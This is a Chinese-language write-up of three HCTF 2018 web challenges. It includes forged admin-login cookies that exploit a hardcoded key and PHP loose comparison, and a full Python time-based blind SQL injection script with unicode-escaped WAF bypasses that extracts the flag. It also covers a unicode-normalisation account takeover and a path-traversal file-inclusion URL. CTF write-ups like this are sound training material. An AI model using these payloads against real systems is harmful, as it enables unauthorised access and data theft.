内容简介:前几天HCTF刚好软考,晚上回家看了下Web然后做了几题,这里简单的记录一下。这个说来有意思,前端时间刚好搞了一个钓鱼站,就是拿这个源码改的,但是当时审了很久没发现什么很好利用的点。首先,我们扫描Web目录,发现存在www.zip 直接下载到本地进行审计。 在
写在前面
前几天HCTF刚好软考,晚上回家看了下Web然后做了几题,这里简单的记录一下。
kzone
这个说来有意思,前端时间刚好搞了一个钓鱼站,就是拿这个源码改的,但是当时审了很久没发现什么很好利用的点。
首先,我们扫描Web目录,发现存在www.zip 直接下载到本地进行审计。 在 include/member.php 中我们发现了他的登录验证逻辑。尝试构造一个Cookie登录。这里有两种方法。
if (isset($_COOKIE["islogin"])) {
if ($_COOKIE["login_data"]) {
$login_data = json_decode($_COOKIE['login_data'], true);
$admin_user = $login_data['admin_user'];
$udata = $DB->get_row("SELECT * FROM fish_admin WHERE username='$admin_user' limit 1");
if ($udata['username'] == '') {
setcookie("islogin", "", time() - 604800);
setcookie("login_data", "", time() - 604800);
}
$admin_pass = sha1($udata['password'] . LOGIN_KEY);
echo $admin_pass,'<br>',$login_data['admin_pass'];
if ($admin_pass == $login_data['admin_pass']) {
$islogin = 1;
} else {
setcookie("islogin", "", time() - 604800);
setcookie("login_data", "", time() - 604800);
}
}
}
方法二,我们构造一个不存在的 admin_user 这时带入数据库查询将查询不出任何值,这时 admin_pass 就变成了 $admin_pass = sha1(LOGIN_KEY); 我们只需要得到 LOGIN_KEY 即可。 幸运的是我们发现
LOGIN_KEY 是写死的,并且题目没有更改这个KEY,我们直接通过他来构造Cookie来进行登录。 Cookie: PHPSESSID=3mj2de89c0hsihqkvsq2vttis5;islogin=1;login_data={"admin_user":"","admin_pass":"3aa526bed244d14a09ddcc49ba36684866ec7661"}
方法二,这里的判断是使用 == 来进行判断的,其可能存在弱类型问题,可以用数字与字符串弱等进行绕过。我们对密码数字进行爆破,发现当密码为65时可以成功登录。 Cookie: PHPSESSID=3mj2de89c0hsihqkvsq2vttis5;islogin=1;login_data={"admin_user":"admin","admin_pass":65}
但是!!!你会发现登录后台并没有什么乱用。咱们继续更进会发现, admin_user 这里是存在注入的 但是,你会发现他有waf,而且很多函数都被过滤了。我们发现
login_data 是经过 json_decode 进行处理的,通过查阅资料我们得知可以使用16encode进行绕过 https://xz.aliyun.com/t/306 于是构造出最终payload
#coding:utf8
import requests
import time
str = 'abcdefghijklmnopqrstuvwxyz0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}~_,'
url = 'http://kzone.2018.hctf.io/admin/index.php'
payload = "islogin=1;login_data={0}\"admin_user\":\"fh'||(case\u0020when\u0020(\u006ceft(("+"SELECT\u0020F1A9\u0020from\u0020F1444g),{1})\u003dbinary'{2}')\u0020then\u0020\u0073leep(2)else\u00200\u0020end)\u0023"+"\",\"admin_pass\":\"0\"{3}"
#print payload
flag = ''
for i in range(1,40):
for a in str:
f1 = flag+a
data = payload.format('{',i,f1,'}')
#print data
starTime = time.time()
headers = {"Cookie":data}
res = requests.get(url,headers=headers)
#print res.text
if time.time()-starTime >2:
flag +=a
print flag
break
print 'flag'+flag
(脚本写的比较烂)
admin
在change页面得到提示 分析源码,我们发现每次在注册和登录的时候都会将用户名转化为小写
参考http://blog.lnyas.xyz/?p=1411 我们可知其会将
ᴬᴬᴬ 转化为 AAA ,那么我们只需注册一个用户名为 ᴬdmin 的账号,登录后修改密码就能达到越权修改 admin 密码的目的
warmup
根据提示获得源码,直接参考https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/ 构造payload: http://warmup.2018.hctf.io/index.php?file=hint.php%253f/../../../../../../../../../../../ffffllllaaaagggg
以上所述就是小编给大家介绍的《HCTF部分Web WriteUp》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
- 你负责人工智能哪部分?人工那部分;知识图谱的构建主要靠人工还是机器?
- cocosdx接bugly,上传符号表,有一部分内容解析出来了, 另一部分没有解析出来
- GO的部分总结~
- MySQL基础部分总结
- python字典实例(部分)
- DDCTF2018 部分writeup
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
